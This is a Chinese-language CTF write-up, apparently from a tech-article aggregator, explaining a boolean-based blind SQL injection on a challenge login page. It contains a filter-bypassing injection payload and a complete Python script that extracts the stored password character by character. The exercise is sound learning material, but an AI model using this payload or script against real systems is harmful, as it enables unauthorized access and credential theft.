2. 程式人生 > 資料庫 >[CTF]基於布林的SQL盲注

[CTF]基於布林的SQL盲注

阿新 發佈:2020-12-26

文章目錄

前言

[CTF學習]基於布林的SQL盲注

一、題目

提  示: 基於布林的SQL盲注
描  述: sql注入

訪問題目,又是一個web login登陸介面,根據提示可以大概猜測是一個sql post注入題。

二、解題步驟

1.bp抓包

POST /index.php HTTP/1.1
Host: 114.67.246.176:10965
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://114.67.246.176:10965/
Cookie: PHPSESSID=j4u9u18ei1r7serqv1vhg9km34
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 79

username=admin&password=123
#當username=admin時提示password error
#可知使用者名稱為 admin
#對username進行注入時,發現<>=都被過濾了,不過or沒有被過濾
#我這邊使用username=a'or(1) or(0)%23 進行sql注入判斷
#將使用者名稱故意輸錯來獲得回顯判斷

構造payload

username=admi'or((ascii(substr((select(password))from(1)))-48))%23&password=123

2、python指令碼

import requests
import time

url = "http://pandarking.ctf:10965/index.php"
headers = {
    'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE'
}
with requests.session() as s:
    database = "passwd:"
    s.keep_alive = False
    s.adapters.DEFAULT_RETRIES = 5
    for i in range(1,32):
        for j in range(48,128):
            sql = 'admi\'or((ascii(substr((select(password))from({0})))-{1}))--\''.format(i,j)
            
            data = {'username':sql,'password':"123"}
            try:
                res = s.post(url,data=data,timeout=5,headers=headers)
            except:
                time.sleep(2)
                res = s.post(url,data=data,timeout=5,headers=headers)
            if 'username does not exist' in res.text:                
                database += chr(j)
                print(database)
                break
            res.close()
 
#得到 passwd:4dcc88f8f1bc05e7c2ad1a60288481a

3、登陸後臺得到flag

謝謝觀看

相關推薦

[CTF]基於布林SQL

文章目錄 前言 [CTF學習]基於布林SQL 一、題目 提  示: 基於布林SQL 描  述: sql注入

END的學習 SQL注入繞過 and POST基於時間和布林

SQL注入繞過 1,大小寫繞過 2,雙寫繞過 3,編碼繞過 可以使用URL編碼,ASCII,HEX,unicode編碼繞過

一道題講懂SQL / [第一章 web入門]SQL注入-2

概述 本題是一個題,可以基於布林也可以基於時間,如果不會的話可以根據提示在網址後面加一個?tips=1降低難度成為一個基於報錯的

dvwa sql教程

原文地址:https://www.jianshu.com/p/757626cec742 一、DVWA-SQL Injection(Blind)測試分析 SQL VS 普通SQL注入:

使用位運算使sql更加高效

如何提高sql的效率和命中率一直是個值得研究的問題 目前的主流方法有 1.遍歷

CTFSHOW-日刷-[萌新賽]萌新記憶/sql

有4個段子,檢視前端沒思路,開掃描 發現存在admin目錄 發現存在注入 fuzz測試一波

一次sql實戰_easysql writeup

一次sql實戰 前言 題目為一道ctf web滲透題。需要滲透到資料庫拿到正確flag並提交。

學習筆記十五:MySQL手之延時基於時間的

背景知識格式:IF(Condition,A,B) 含義:如果Condition成立,則A,否則B substr函式 ascii函式

學習筆記十九:Mssql手布林

1.判斷是否存在注入 \' and 1=1 and 1=2 2.猜解資料庫名 and exists(select top 1 name from Master..SysDatabases where unicode(substring(name,1,1))=109)

DVWA-SQL Injection (Bind) SQL

同於union select查詢注入,只能得到資料庫回顯的正確和錯誤,利用返回的正確和錯誤一個一個判斷。

CTF-sql-order by

本文章只討論了order by,關於order by的報錯等注入不在本文章討論範圍,另有文章。

BUUOJ | [CISCN2019 華北賽區 Day2 Web1]Hack World(SQL布林

題目地址 用瀏覽器連線靶機,看到以下頁面 右鍵檢視原始碼,發現上傳用的是 post 請求,根據提示知道 flag 位於 flag 表中的 flag 欄位裡

SQL注入技巧之顯中過濾逗號繞過詳析

前言 sql注入在很早很早以前是很常見的一個漏洞。後來隨著安全水平的提高,sql注入已經很少能夠看到了。但是就在今天,還有很多網站帶著sql注入漏洞在執行。下面這篇文章主要介紹了關於SQL注入逗號繞過的相關內容,分

SQL Server手之延時型時間

近來處理安全問題遇到的sql注入: 延時函式 WAITFOR DELAY WAITFOR是SQL Server中Transact-SQL提供的⼀個流程控制語句。它的作⽤就是等待特定時間,然後繼續執⾏後 續的語句。它包含⼀個引數DELAY,⽤來指定等待的時

sql bool

[CISCN2019 總決賽 Day2 Web1]Easyweb 考察: robots.txt image.php?bak檔案洩露,image.php.bak可以下載別的不大行

SQL注入漏洞--和寬位元組注入

是注入的一種,指的是在不知道資料庫返回值的情況下對資料中的內容進行猜測,實施SQL注入。一般分為布林基於時間的和報錯的

[sql 注入] insert 報錯注入與延時

insert注入的技巧在於如何在一個欄位值內構造閉合。 insert 報錯注入 演示案例所用的表:

初學Web安全之sql注入(四)—— (1)

當你的輸入沒有回顯,也沒有報錯的時候,但是輸入正確和錯誤的值時,頁面有不同表現時,這時候我們可以嘗試使用布林

sqli-labs less-8(布林)

less-8 布林 首先利用?id=1\' and 1=1 --+和?id=1\' and 1=2 --+確定id的型別為單引號\'\'包裹。然後進行

十六:SQL注入之查詢方式及報錯

在很多入時,有很多注入會出現無回顯的情況,其中不回顯的原因可能是SQL查詢語句有問題,這時候我們需要用到相關的報錯或者盲注進行後續操作,同時作為手工注入的時候,需要提前瞭解SQL語句能更好的選擇對應的